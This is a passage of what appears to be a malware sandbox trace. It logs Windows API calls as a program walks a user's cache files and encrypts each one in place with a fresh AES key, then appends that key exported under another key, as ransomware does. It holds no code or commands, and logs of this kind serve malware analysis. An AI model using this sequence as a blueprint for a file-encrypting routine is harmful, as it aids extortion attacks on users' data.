dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.270] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.270] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.271] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.271] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0146.271] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.271] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.271] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.271] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.271] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.271] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.271] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.272] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.272] CloseHandle (hObject=0x198) returned 1 [0146.334] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.340] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.340] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.340] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.341] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.341] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", dwFileAttributes=0x80) returned 1 [0146.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.342] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0146.342] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0146.342] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.342] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.343] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.343] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.343] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0146.343] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.343] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.343] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.343] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.344] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.344] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.344] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.344] CloseHandle (hObject=0x198) returned 1 [0146.366] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.372] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.372] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.372] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.372] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", dwFileAttributes=0x80) returned 1 [0146.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.373] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=408) returned 1 [0146.373] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=408) returned 1 [0146.373] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.373] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.419] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.419] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.419] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.420] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.420] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x198, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x198, lpOverlapped=0x0) returned 1 [0146.420] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.420] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x198, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0146.420] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.420] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0146.420] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.420] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.420] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.420] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.421] CloseHandle (hObject=0x198) returned 1 [0146.440] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.473] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.473] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.474] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.474] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.474] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", dwFileAttributes=0x80) returned 1 [0146.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.531] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=386) returned 1 [0146.531] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=386) returned 1 [0146.531] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.531] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.531] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.531] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.532] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.532] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.532] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x182, lpOverlapped=0x0) returned 1 [0146.532] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.532] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x182, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.532] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.532] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.532] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.532] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.532] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.532] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.532] CloseHandle (hObject=0x198) returned 1 [0146.555] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.559] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.559] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.559] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.560] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", dwFileAttributes=0x80) returned 1 [0146.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.560] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0146.560] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0146.560] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.560] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.570] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.570] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.570] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.570] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.570] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0146.570] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.570] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.570] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.570] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.570] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.570] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.570] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.570] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.570] CloseHandle (hObject=0x198) returned 1 [0146.587] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.591] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.592] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.592] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.592] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", dwFileAttributes=0x80) returned 1 [0146.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.593] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=390) returned 1 [0146.593] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=390) returned 1 [0146.593] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.593] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.594] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.594] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.594] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.594] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.594] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x186, lpOverlapped=0x0) returned 1 [0146.594] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.594] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x186, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.594] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.594] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.594] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.594] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.594] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.594] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.594] CloseHandle (hObject=0x198) returned 1 [0146.612] VirtualFree (lpAddress=0x2760000, dwSize=0x0, 